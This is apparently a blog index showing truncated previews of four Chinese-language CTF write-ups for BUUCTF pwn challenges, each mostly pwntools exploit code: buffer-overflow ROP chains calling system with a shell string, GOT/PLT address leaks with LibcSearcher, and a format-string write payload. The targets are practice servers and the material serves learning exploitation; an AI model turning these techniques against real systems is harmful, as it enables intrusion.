ciscn_2019_n_5 wp

January 10, 20261 分钟阅读 BUUBUU

from pwn import * from LibcSearcher import * local_file = ('./ciscn_2019_n_5') select = 1 if select == 0: r = process(local_file) else: r = remote('node5.buuoj.cn', 27578) elf = ELF(local_file) context.log_level = 'debug' offset1 = 64 offset2 = 0x20+0x08 puts_got = elf.got["puts"] puts_plt = elf.plt["puts"] main_addr =...

ciscn_2019_ne_5 wp

January 10, 20261 分钟阅读 BUUBUU

from pwn import * # p = process('./ne_5') p = remote("node5.buuoj.cn", 29898) sh = 0x80482ea sys_addr = 0x080484D0 # 使用ROPgadget找 p.sendlineafter("password:", b'administrator') p.sendlineafter(b'0.Exit\n:', b'1') payload = b'a' * (0x48 + 4) + p32(sys_addr) + b'aaaa' + p32(sh) # 使用system函数传参 同时用任意数据填充4个字节的返回地址...

jarvisoj_fm wp and exp

January 10, 20262 分钟阅读 BUUBUU

payload3 = b'AAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p' io.sendline(payload3) 看到0x41414141在11个 from pwn import * #start r = process("../buu/jarvisoj_fm") #params x_addr = 0x804A02C #attack payload = b'%4c%13$n' + p32(x_addr) print(payload) r.sendline(payload) r.interactive() 1. p32(x_addr):指定“写入的目标” 含义...

铁人三项(第五赛区)_2018_rop wp

January 10, 20262 分钟阅读 BUUBUU

from pwn import * from LibcSearcher import LibcSearcher context(arch='i386', os='linux', log_level='debug') io = connect('node5.buuoj.cn',29724) # 与在线环境交互。 #_______________需要用到的地址区包括offset_____________________ leak_func = 0x08048474 main_addr = 0x080484C6 offset1 = 0x88 + 4...